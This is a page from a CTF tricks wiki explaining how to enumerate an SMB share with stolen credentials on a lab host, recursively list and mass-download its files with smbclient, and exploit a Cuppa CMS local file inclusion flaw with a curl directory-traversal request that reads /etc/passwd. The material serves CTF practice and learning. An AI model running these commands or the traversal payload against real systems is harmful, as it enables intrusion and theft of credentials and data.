> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-6/enumeration/trick-0315.md).

# Authenticated SMB Share Enum for Exploit

***

Authenticate to the target SMB share using compromised credentials (e.g., as user `milesdyson`). This can be done using tools like `smbclient`. For example, to connect to a share like `milesdyson` on `10.10.10.72` with the username `milesdyson` and a password (e.g., `luffy`), the command would be:

```bash
smbclient //10.10.10.72/milesdyson -U milesdyson%luffy
```

Alternatively, if the username is provided interactively or separately, the syntax might be:

```bash
smbclient //IP/share -U username
```

Once authenticated, perform thorough, recursive directory listing and analysis of the share contents. A recursive listing can be achieved directly with `smbclient`:

```bash
smbclient //10.10.10.72/milesdyson -U milesdyson%luffy -c 'ls -R'
```

The `-c` option allows executing commands non-interactively. The `ls -R` command performs a recursive directory listing within the share. Other examples of listing files include simply using `ls`:

```bash
smbclient //IP/share -U user%password -c "ls"
```

or connecting without a password (if allowed):

```bash
smbclient //IP/share -N -c 'ls'
```

Pay close attention to non-standard directories, configuration files, source code, or any files that seem out of place or related to specific applications. The goal is to uncover hidden information, such as the discovery of a 'secret directory' which might lead to finding specific files (like `/alertConfigField.php`) indicating vulnerabilities (e.g., LFI/RFI) in associated applications like "Cuppa CMS". The file `alertConfigField.php` in Cuppa CMS, for instance, has been associated with Local File Inclusion (LFI) vulnerabilities, often exploitable via the `url` parameter. Such a vulnerability could potentially be exploited using a command like:

```bash
curl "http://10.10.10.72/cuppa/alerts/alertConfigField.php?url=../../../../../../../../../etc/passwd"
```

This type of exploit attempts to read sensitive system files, like `/etc/passwd`, by manipulating the `url` parameter with directory traversal sequences. Information gleaned from such file reads can sometimes reveal further compromised credentials.

Relevant files, such as `important_backup.zip`, once identified through directory listing, can be retrieved using `smbclient`. Within an interactive session, after connecting, you can use the `get` command:

```
smb: /> get important_backup.zip
```

Or directly via the command line using the `-c` option:

```bash
smbclient //10.10.10.72/milesdyson -U milesdyson%luffy -c 'get important_backup.zip'
```

To download multiple files or recursively download a directory, you can enter interactive mode and use the `recurse` and `mget` commands:

```bash
smbclient //10.10.10.72/milesdyson -U milesdyson%luffy
```

Then, inside the interactive session:

```
smb: /> recurse ON
smb: /> prompt OFF
smb: /> mget *
```

This sequence sets recursive download on, turns off prompting for each file, and then downloads all files and directories from the current location recursively.
